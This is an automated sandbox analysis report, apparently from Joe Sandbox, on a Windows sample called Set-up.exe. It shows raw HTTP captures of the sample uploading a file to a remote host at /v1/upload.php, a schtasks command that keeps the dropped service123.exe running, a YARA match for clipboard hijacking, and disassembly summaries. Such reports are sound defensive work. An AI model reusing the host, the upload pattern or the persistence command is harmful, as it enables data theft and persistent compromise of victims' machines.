Oct 4, 2024 14:43:59.061044931 CEST	1236	OUT	Data Raw: db 66 5a dc d3 14 c0 89 39 a2 cf 3e 3b 37 ae df 04 cb a9 ae 67 58 88 00 6f f4 31 43 e1 57 46 0e aa e8 59 f1 48 0a 24 81 25 d8 d5 46 e0 24 aa 11 a1 56 48 d3 24 cd d2 e1 25 43 93 eb d2 1a 33 dc c1 60 8b 9a 60 01 7f fa 2d 21 58 8a de cf e9 4c ff 8f Data Ascii: fZ9>;7gXo1CWFYH$%F$VH$%C3``-!XL)}r?HUcHe2Z}nDS#n'\|1OWAVC.HN1}Ks49-!(eaf_;wK9^RF3Bp%L36edFQb%e*e,U
Oct 4, 2024 14:43:59.061183929 CEST	4944	OUT	Data Raw: 0c a2 79 9d 53 76 3f d1 66 9b 79 93 70 7c f4 47 1d 13 ef 8d 57 36 30 5f ff d8 e8 aa ba d6 bb 54 d4 62 f2 1a c0 3b 7b a9 c6 1f 70 92 36 f3 be 3c bd 62 1e 90 ee cb fc 28 c8 2b 77 99 fa 53 ab 0d cf 05 dd 5b 10 47 67 ca 8f f0 60 65 7f 3a 83 af 1b b5 Data Ascii: ySv?fyp\|GW60_Tb;{p6<b(+wS[Gg`e:y;S@smz![S>a20a}u8=iX}T4z!Q]?l;hK@" 1ADZ9B\4QjltC>hdVbR-7D`\|j}}
Oct 4, 2024 14:43:59.061414957 CEST	7416	OUT	Data Raw: f0 75 0f f6 64 a9 47 d2 5b 79 0d 9d 2b 90 73 bd 42 84 ff 3e 6b 1a 1f fa 80 5f ab d5 5f 2b fa 5c 9e 48 ec 67 a0 ab b9 01 76 1e 97 e9 65 7d 50 09 20 1d e0 ea f2 a6 37 1d 99 51 f5 c8 8e 6f b3 39 28 82 08 04 64 15 44 2f 59 49 89 0e 6e bb e3 23 98 c2 Data Ascii: udG[y+sB>k__+\Hgve}P 7Qo9(dD/YIn#+fp%Qm@Exd>Hp4WomV>;:%mB#\|u9,}eK+gd(\De%:[+TSh_e2uGd=Y`+W
Oct 4, 2024 14:43:59.061448097 CEST	2472	OUT	Data Raw: 19 8f 89 86 1f 7b 6d 68 84 3e 35 4b db b5 e8 fc a4 e7 42 31 2c 3b 9a f3 8d d3 4d be 3d f4 c0 20 e2 d1 06 1f c7 bd 3b 11 5e 77 ff 56 c5 75 28 95 43 29 3b 77 26 85 fb 4c 54 8b 3c da 39 e6 2a a7 9d 10 bd 33 c9 8d ed 9d 66 90 08 7a 08 eb 0e ad 6e 92 Data Ascii: {mh>5KB1,;M= ;^wVu(C);w&LT<9*3fznwL[ir~xO$o?mLy~hfN:k}$?"cP87(/$RxVd5-{rU=p9SjC^4hzdqQ1
Oct 4, 2024 14:43:59.061481953 CEST	2472	OUT	Data Raw: c7 29 d6 f2 a5 45 d4 f5 6c 0d b6 66 b7 dd 62 52 07 ad 44 0e c4 c2 08 6c e8 28 f8 c9 f1 f1 e0 af c7 2d 88 9b 71 7d 39 e7 a5 8c 19 01 66 a6 c2 50 cc b5 b1 d9 c6 c5 9a 53 05 93 7a 02 e8 64 ba 87 83 d7 c0 e7 c1 72 89 66 9d 07 37 42 97 d9 1d 94 06 1d Data Ascii: )ElfbRDl(-q}9fPSzdrf7B7&6Gc^\|:keb]E$>F/d'p;~=f> L73'XmWimy6OFOKKtU">a[^$\7qnx;E0qucCJwAx%K
Oct 4, 2024 14:43:59.061501980 CEST	4944	OUT	Data Raw: fd 18 46 f1 50 4b 1e 3b ad e2 5a 00 28 4d 7f e3 80 68 70 29 c9 90 f5 bb be 78 a1 4f 93 50 4f 86 99 46 16 7a 8b 35 3c 4f 57 d4 5f 05 a8 35 c0 1d 44 29 d8 13 cc 55 5c d7 ab b1 d2 ab 1b 23 14 65 b1 92 77 6f 7f 4a 96 dd 73 08 25 91 06 5a 69 7c 12 73 Data Ascii: FPK;Z(Mhp)xOPOFz5<OW_5D)U\#ewoJs%Zi\|sM'KnS4RD7}gbvY5&!V[6c<[\|O$<Pwz! To~C:e}!_`QJzL0<Xy^Y*3.jwzO
Oct 4, 2024 14:43:59.068722010 CEST	7416	OUT	Data Raw: 1b 6a c1 d8 d5 d2 d3 73 e4 4a 45 a9 00 83 96 d2 cc 68 68 45 89 a0 3f 7a 1a c8 b6 14 44 64 75 61 db 50 ce 61 c0 46 ef 88 b8 74 28 16 f0 f3 5b 3b 21 97 c9 fd e5 49 35 af 14 95 ec d1 44 1f 11 2f 65 f9 d7 9c 99 d4 3d 29 23 93 50 03 6b a7 26 fd 72 07 Data Ascii: jsJEhhE?zDduaPaFt([;!I5D/e=)#Pk&re(Opuqb F+U`j...r5`V/nbu\|bi,@C}>'T,;I-b+R[OhGCwzsmx<{JAl
Oct 4, 2024 14:43:59.069880962 CEST	2472	OUT	Data Raw: 5f 6d 0a 18 08 a9 7f 78 18 59 29 f9 0b 57 1c 21 cf 5f f3 1a 69 30 84 28 f4 66 9b 02 a8 86 1f 7a 07 f8 7f 19 d2 67 35 92 ed c4 3b 78 8b fa 94 50 a2 3b c8 a1 81 a0 fa 32 2a 42 75 56 03 42 87 ba 58 cd d3 c6 17 d5 70 ca 77 c4 65 3b 63 39 80 9a 94 7e Data Ascii: _mxY)W!_i0(fzg5;xP;2*BuVBXpwe;c9~A^Y94C#wz1@vQ21Y$o~<@D%^WE}7[L((2EtrL<J%&$QSD:Y#KI#eR'k+r{ku,I`
Oct 4, 2024 14:43:59.069901943 CEST	2472	OUT	Data Raw: 70 02 87 05 a0 17 a1 7c a1 94 f4 5b 70 01 a3 52 8b 5f 0b 05 e5 50 49 d2 4e 56 b4 d8 1b ec 30 31 ae df 13 1f 62 1d 7a d4 9c 57 9b c9 f3 58 b3 ea bc 53 55 65 bf 12 0e 96 71 60 01 ef 71 24 f1 06 d5 da f2 c0 04 2a 81 0b f0 db ab 0f 2c b1 31 74 1c b4 Data Ascii: p\|[pR_PINV01bzWXSUeq`q$*,1tvr9vLR-iDY&] Oa0[7Wgx<H fNek\@:@]}E+A\|z7>V1Tes6cm
Oct 4, 2024 14:43:59.989101887 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:43:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49880	185.244.181.140	80	7300	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:03.191478014 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary46959985 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30035 Host: tventyvr20pt.top
Oct 4, 2024 14:44:03.191543102 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 36 39 35 39 39 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 65 78 Data Ascii: ------Boundary46959985Content-Disposition: form-data; name="file"; filename="Mexemax.bin"Content-Type: application/octet-stream9ZD<LE%xe>if?.Y3XP1Wdf.ZI]ZsH~OMF~N~noAvrZ
Oct 4, 2024 14:44:03.196430922 CEST	1236	OUT	Data Raw: 00 b6 15 5b cc 61 90 6a d0 15 08 af 35 c3 c2 73 e1 1b a5 59 74 6c 73 c6 a2 fa b4 54 5d 2a 06 3d 3e c8 b5 33 25 2b ff 59 9e 73 a1 98 d6 df 3f d6 df ef 44 ad 13 35 1a 6d ca b0 2f ce a4 02 b2 27 b9 23 cf ba ab 0d a4 a7 d9 2e 14 b2 5c f9 2f 4c 8f b2 Data Ascii: [aj5sYtlsT]=>3%+Ys?D5m/'#.\/L;!F{x,$hbhXKVV!34j.76hcQ.A(0!u{RWbvhO*J{+f1.GzKZ#dfDo@m\5E23xDw47\|yCsqRP
Oct 4, 2024 14:44:03.196469069 CEST	2472	OUT	Data Raw: 61 78 48 5b 96 e4 5a 04 20 a2 93 e6 c6 a0 fa d6 fb 1a 9a f6 8f ae 3d 21 e6 eb f2 83 53 52 94 8a 1a fe b6 bb fd bd df 90 ae 09 47 8e 5b c8 6d 30 84 bc 86 cd e4 d2 22 4b bd 2e 83 7e e6 cc e5 5e 0c d5 57 30 80 88 60 25 f0 ba cd 88 3e 98 8b 71 54 26 Data Ascii: axH[Z =!SRG[m0"K.~^W0`%>qT&R7Ka+y37:Pw*jFa%83;-l77I;'USU"pId`~PIN??x;YIUZUw2oh5'(8
Oct 4, 2024 14:44:03.196578026 CEST	7416	OUT	Data Raw: c0 90 30 50 a9 aa eb 88 d8 1d 4b 09 d2 a1 dd 48 cf 32 88 8a 8f 13 3c 09 ea 77 03 96 59 48 5a bf 24 3b eb 0a 56 17 a8 d3 f9 81 42 5c c2 49 2d df e1 df 44 ec 6d 0b d4 c0 a0 c9 2f 46 52 22 58 95 7d b8 ad 9d 2b 20 a8 49 68 0b fb 80 78 97 64 73 ff d2 Data Ascii: 0PKH2<wYHZ$;VB\I-Dm/FR"X}+ IhxdslEo>=Kj/~}6mP7vcOU{c1.rnh!63W&JB.2)T6DH[-\|&cZ8-;-DU46:!_U
Oct 4, 2024 14:44:03.196618080 CEST	4944	OUT	Data Raw: e2 ff 08 5c a2 6d e4 59 78 a6 8a 81 38 c8 4d 8d 54 ad 15 0d 1b 63 24 c5 35 ef 53 58 8f fe 33 50 fc 9e 0b 05 be d3 3c 7f 41 fd 3c a8 d4 95 f4 50 fc bf 5c ee d0 bf bd b6 a6 ee 4c 2c 4d aa 38 2c 4f f4 6c 42 da b3 0f 68 e8 77 ae 2c 61 b1 c5 78 31 57 Data Ascii: \mYx8MTc$5SX3P<A<P\L,M8,OlBhw,ax1W{a^mV)^5n_A[snesH[%v`yt1J"!@hIe"yYt[esj[4u+-M)2X7-o6b7D
Oct 4, 2024 14:44:03.196681023 CEST	2843	OUT	Data Raw: 22 0f 23 e8 ab 07 29 46 00 a2 69 79 7b 62 82 ad 9c 2e 7e a4 4a b1 d3 18 c0 47 29 b8 79 9a bd ca 0e 2f 98 9d 3e af c5 c4 1f 73 58 cf be d1 2e 0c 5e ce 0d 60 1a 4e 72 53 9f dc f1 93 15 4b c2 12 55 ad 9f cc bc 22 8d 92 c7 5a eb d9 89 d8 12 a4 f4 87 Data Ascii: "#)Fiy{b.~JG)y/>sX.^`NrSKU"Z>[\|zUhn T0lbr<R+N8sCQ_n~g=P<>2z%\|wSNj{8LtTzRg8V3fTyU%tL
Oct 4, 2024 14:44:04.010476112 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	1
Start time:	08:43:44
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x710000
File size:	9'964'544 bytes
MD5 hash:	B13E354D435E1C6058A47F21C02D340D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000001.00000003.2071148102.0000000004263000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:44:52
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x7b0000
File size:	314'617'856 bytes
MD5 hash:	9B62814A6554664282F49BF19A2D734C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:44:53
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x510000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:44:53
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:44:55
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x7b0000
File size:	314'617'856 bytes
MD5 hash:	9B62814A6554664282F49BF19A2D734C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:45:03
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x7b0000
File size:	314'617'856 bytes
MD5 hash:	9B62814A6554664282F49BF19A2D734C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	45.4%
Total number of Nodes:	97
Total number of Limit Nodes:	3

Executed Functions

Function 007B116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 007B11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 007B1238
__p__acmdln.MSVCRT ref: 007B1261
malloc.MSVCRT ref: 007B12EB
strlen.MSVCRT ref: 007B1323
malloc.MSVCRT ref: 007B132E
memcpy.MSVCRT ref: 007B1344
GetStartupInfoA.KERNEL32 ref: 007B1433

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 30352f81620aa19adc9255e2a7715c8d8c54a4f37b38ea45722049748218e653
Instruction ID: cf7f3ce0b76058ed3326cbbad4b8cae6a07e975c540436762b82d88fd19591a4
Opcode Fuzzy Hash: 30352f81620aa19adc9255e2a7715c8d8c54a4f37b38ea45722049748218e653
Instruction Fuzzy Hash: C9818F71A04209CFDB20EF68D8A87EA77E0FB44344F90862DE9859B311E77D9C45CB96

Function 007B15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 007B15CD
_exit.MSVCRT ref: 007B161A
_write.MSVCRT ref: 007B166A
_close.MSVCRT ref: 007B1679

Strings

@, xrefs: 007B8341
terminated, xrefs: 007B1640
CONOUT$, xrefs: 007B15C6

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 1a57978457a896015c25f0bffd4ce919d4bd8e0b499dde93f2ca7e6d5b3c141e
Instruction ID: 16c4121c190e819747c6f1f9ae20dce42b82feaa7f169d87f8018bb3f7294f87
Opcode Fuzzy Hash: 1a57978457a896015c25f0bffd4ce919d4bd8e0b499dde93f2ca7e6d5b3c141e
Instruction Fuzzy Hash: C14139709082059FDB50EF78C858BAEBBF4AB84354F408A2DE854D7250EB3CC845CB56

Function 6CA214B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6CA214CD
_exit.MSVCRT ref: 6CA2151A
_write.MSVCRT ref: 6CA2156A
_close.MSVCRT ref: 6CA21579

Strings

CONOUT$, xrefs: 6CA214C6
@, xrefs: 6CAF4AB1
terminated, xrefs: 6CA21540

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 9d1f26e41e89fccff9bf860b92696b6af9d53647c8e47c3adb08dedc8b8e06e8
Instruction ID: c9df7fdcd923f3fa41e78e6a7ec3f5aab9d8a68829f4479189ba3a4c49581c41
Opcode Fuzzy Hash: 9d1f26e41e89fccff9bf860b92696b6af9d53647c8e47c3adb08dedc8b8e06e8
Instruction Fuzzy Hash: F6413CB09083059FDB00EFB9C54466ABBF4BB49318F048A2DE8A9D7740E775D885CB56

Function 6CA39C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CA39EB0: GetClipboardSequenceNumber.USER32 ref: 6CA39EBE

Sleep.KERNELBASE ref: 6CA39BFF
GetClipboardSequenceNumber.USER32 ref: 6CA39C08

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: c7a793640a7c0bd3752a82882fabed89449c123857ed5c3e8c87a3f39afeb87b
Instruction ID: a0fb7ba617e96dd7fda91656dc885b994a856bde027ca3d7f97048365411bca5
Opcode Fuzzy Hash: c7a793640a7c0bd3752a82882fabed89449c123857ed5c3e8c87a3f39afeb87b
Instruction Fuzzy Hash: 6A41E8709082158FCB00FF74D7995AEBBF4AF45208F44892DE89A97644EB34D58DCB93

Function 007B81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,007B138E,?,?,00006EA2,007B138E), ref: 007B8271
GetProcAddress.KERNEL32 ref: 007B828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,007B138E,?,?,00006EA2,007B138E), ref: 007B829D

Strings

BcpxgvhdgwEWleuldZYu, xrefs: 007B827E
Failed to get function address. Error code: %d, xrefs: 007B82E0
siNpVQuBSTLTLeNwTLTLeNwdJHL.dll, xrefs: 007B824A

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: BcpxgvhdgwEWleuldZYu$Failed to get function address. Error code: %d$siNpVQuBSTLTLeNwTLTLeNwdJHL.dll
API String ID: 145871493-2405907603
Opcode ID: dbc99dc5822cee69045f4dbdda5cd4040050540f024eaf7ebe2a694e68843da8
Instruction ID: d26435147dfcbef26a5133bc8a56fd9e2aa462ff940f9b4aa7e97a841226cd04
Opcode Fuzzy Hash: dbc99dc5822cee69045f4dbdda5cd4040050540f024eaf7ebe2a694e68843da8
Instruction Fuzzy Hash: 55314F72809605AFD700BF78DD49ADABBF8FB49300F108A28E95583210EA7DD945CB97

Function 007B8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,007B138E,?,?,00006EA2,007B138E), ref: 007B8271
GetProcAddress.KERNEL32 ref: 007B828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,007B138E,?,?,00006EA2,007B138E), ref: 007B829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007B138E,?,?,00006EA2,007B138E), ref: 007B82BD
GetLastError.KERNEL32 ref: 007B82DA
FreeLibrary.KERNEL32 ref: 007B82F3

Strings

BcpxgvhdgwEWleuldZYu, xrefs: 007B827E
siNpVQuBSTLTLeNwTLTLeNwdJHL.dll, xrefs: 007B824A
Failed to load DLL. Error code: %d, xrefs: 007B82C3

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: BcpxgvhdgwEWleuldZYu$Failed to load DLL. Error code: %d$siNpVQuBSTLTLeNwTLTLeNwdJHL.dll
API String ID: 1397630947-1546779541
Opcode ID: 763118136456a7636942e80f1053e179acd5dad8f163790e4c9256b94217e8b1
Instruction ID: ebb523a878ef3b9d8f532721154db95865d43deef05df699becf701553578e60
Opcode Fuzzy Hash: 763118136456a7636942e80f1053e179acd5dad8f163790e4c9256b94217e8b1
Instruction Fuzzy Hash: BB11AF72904608ABDB10BFB8DD49BDE7BA8FB45300F508628D95587241FF7DD901CA57

Function 007B13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 007B1238
__p__acmdln.MSVCRT ref: 007B1261
malloc.MSVCRT ref: 007B12EB
strlen.MSVCRT ref: 007B1323
malloc.MSVCRT ref: 007B132E
memcpy.MSVCRT ref: 007B1344
_amsg_exit.MSVCRT ref: 007B13EA
_initterm.MSVCRT ref: 007B140C

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: a21b8e36dbe2f30d8e53a810062b29728be7c2ab66edc834ef88560bf04a5a81
Instruction ID: d7ffa1df9d33d47471824856d6de06f369e6fe504dcfa300b50c7ec1e73a8d07
Opcode Fuzzy Hash: a21b8e36dbe2f30d8e53a810062b29728be7c2ab66edc834ef88560bf04a5a81
Instruction Fuzzy Hash: 0241F8B4A08305CFDB64FF68D8A8799B7E0BB44340F90862DE98597311E77C9845CB46

Function 007B11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 007B11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 007B1238
__p__acmdln.MSVCRT ref: 007B1261
malloc.MSVCRT ref: 007B12EB
strlen.MSVCRT ref: 007B1323
malloc.MSVCRT ref: 007B132E
memcpy.MSVCRT ref: 007B1344
_amsg_exit.MSVCRT ref: 007B13EA
_initterm.MSVCRT ref: 007B140C

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: fb5cd178a9efa3c8e2c47a7b50209f9d6b757f0be65cd2d242f99c4e82ea09ae
Instruction ID: 16fedc218976117ea69d29e45751690b9aee6454814ec45abfdfc3e595e03d17
Opcode Fuzzy Hash: fb5cd178a9efa3c8e2c47a7b50209f9d6b757f0be65cd2d242f99c4e82ea09ae
Instruction Fuzzy Hash: 6D410CB4A04305CFDB60EF68D8A4B9EB7F0BB44344F90862DD94597350E77C9845CB96

Function 007B1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 007B11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 007B1238
__p__acmdln.MSVCRT ref: 007B1261
malloc.MSVCRT ref: 007B12EB
strlen.MSVCRT ref: 007B1323
malloc.MSVCRT ref: 007B132E
memcpy.MSVCRT ref: 007B1344
GetStartupInfoA.KERNEL32 ref: 007B1433

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
